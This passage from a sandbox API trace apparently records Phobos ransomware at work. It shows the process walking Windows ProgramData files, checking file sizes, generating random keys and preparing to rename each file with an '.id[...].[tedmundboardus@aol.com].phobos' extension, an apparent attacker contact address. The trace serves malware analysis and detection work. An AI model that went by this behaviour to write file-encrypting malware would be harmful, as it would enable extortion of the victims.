(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.645] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.645] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.645] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=112353) returned 1 [0122.645] CloseHandle (hObject=0x334) returned 1 [0122.645] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma")) returned 0x20 [0122.645] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.645] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.646] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.646] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.646] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=94457) returned 1 [0122.646] CloseHandle (hObject=0x334) returned 1 [0122.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma")) returned 0x20 [0122.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.646] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.646] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.646] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.647] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1282) returned 1 [0122.647] CloseHandle (hObject=0x334) returned 1 [0122.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk")) returned 0x20 [0122.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.647] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.647] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.647] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.647] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1388) returned 1 [0122.647] CloseHandle (hObject=0x334) returned 1 [0122.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk")) returned 0x20 [0122.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.648] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.648] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.648] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.650] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1230) returned 1 [0122.650] CloseHandle (hObject=0x334) returned 1 [0122.652] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk")) returned 0x20 [0122.652] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.652] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.652] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.652] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.653] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1266) returned 1 [0122.653] CloseHandle (hObject=0x334) returned 1 [0122.653] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk")) returned 0x20 [0122.653] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.653] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.653] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.653] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.654] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1364) returned 1 [0122.654] CloseHandle (hObject=0x334) returned 1 [0122.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk")) returned 0x20 [0122.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.654] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.654] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.654] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.655] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1238) returned 1 [0122.656] CloseHandle (hObject=0x334) returned 1 [0122.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk")) returned 0x20 [0122.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.656] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.656] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.656] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.656] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1242) returned 1 [0122.656] CloseHandle (hObject=0x334) returned 1 [0122.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk")) returned 0x20 [0122.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.657] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.657] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.657] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.657] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1242) returned 1 [0122.657] CloseHandle (hObject=0x334) returned 1 [0122.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk")) returned 0x20 [0122.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.658] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.658] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1367) returned 1 [0122.658] CloseHandle (hObject=0x334) returned 1 [0122.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk")) returned 0x20 [0122.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.659] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.659] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.659] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1272) returned 1 [0122.659] CloseHandle (hObject=0x334) returned 1 [0122.659] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk")) returned 0x20 [0122.659] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.659] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.660] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.660] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.661] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1330) returned 1 [0122.661] CloseHandle (hObject=0x334) returned 1 [0122.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk")) returned 0x20 [0122.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.661] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.661] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.661] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.662] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1351) returned 1 [0122.662] CloseHandle (hObject=0x334) returned 1 [0122.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk")) returned 0x20 [0122.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.662] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.662] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.662] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.662] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1254) returned 1 [0122.663] CloseHandle (hObject=0x334) returned 1 [0122.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk")) returned 0x20 [0122.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.663] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.663] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.663] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.663] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1248) returned 1 [0122.663] CloseHandle (hObject=0x334) returned 1 [0122.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk")) returned 0x20 [0122.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character 